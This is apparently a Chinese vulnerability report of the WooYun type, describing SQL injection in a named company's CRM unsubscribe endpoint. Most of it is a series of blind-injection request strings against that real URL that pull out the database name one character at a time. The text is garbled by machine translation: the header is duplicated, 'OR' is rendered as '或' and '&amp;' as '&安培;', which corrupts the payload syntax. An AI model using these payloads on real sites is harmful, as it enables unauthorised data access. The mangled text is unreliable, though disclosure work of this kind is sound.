空中网某站SQL注入

漏洞标题 空中网某站SQL注入 相关厂商 空中网 漏洞作者 路人甲 提交时间 2016-05-04 09:14 公开时间 2016-06-18 10:40 漏洞类型 SQL注射漏洞 危害等级 高 自评…

漏洞标题 空中网一站SQL注入 相关制造商 空中网络 漏洞作者 过路人 提交时间 2016-05-04 09: 14 公共时间 2016-06-18 10: 40 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 Php +字符型注射 漏洞详细信息 http://crm.kongzhong.com/subscribe.php Email=50& flag=37& list_name=1& list_request=unsubscribe& rem_warn=1& submit=Report& unsub_type=flag& unsubscribe_cause=1

漏洞证明: 邮件列表 Email=50& flag=37& list_name=-7034'或ascii(mid(database()from(1)for(1)))=109#& list_request=unsubscribe& rem_warn=1& submit= &安培; unsub_type=标志&安培; unsubscribe_cause=1 Email=50& flag=37& list_name=-7034'或ascii(mid(database()from(2)for(1)))=97#& list_request=unsubscribe& rem_warn=1& submit= &安培; unsub_type=标志&安培; unsubscribe_cause=1 Email=50& flag=37& list_name=-7034'或ascii(mid(database()from(3)for(1)))=105#& list_request=unsubscribe& rem_warn=1& submit= &安培; unsub_type=标志&安培; unsubscribe_cause=1 Email=50& flag=37& list_name=-7034'或ascii(mid(database()from(4)for(1)))=108#& list_request=unsubscribe& rem_warn=1& submit= &安培; unsub_type=标志&安培; unsubscribe_cause=1 Email=50& flag=37& list_name=-7034'或ascii(mid(database()from(5)for(1)))=108#& list_request=unsubscribe& rem_warn=1& submit= &安培; unsub_type=标志&安培; unsubscribe_cause=1 Email=50& flag=37& list_name=-7034'或ascii(mid(database()from(6)for(1)))=105#& list_request=unsubscribe& rem_warn=1& submit= &安培; unsub_type=标志&安培; unsubscribe_cause=1 Email=50& flag=37& list_name=-7034'或ascii(mid(database()from(7)for(1)))=115#& list_request=unsubscribe& rem_warn=1& submit= &安培; unsub_type=标志&安培; unsubscribe_cause=1 Email=50& flag=37& list_name=-7034'或ascii(mid(database()from(8)for(1)))=116#& list_request=unsubscribe& rem_warn=1& submit= &安培; unsub_type=标志&安培; unsubscribe_cause=1 修理计划: 版权声明:请注明出处。居民A @乌云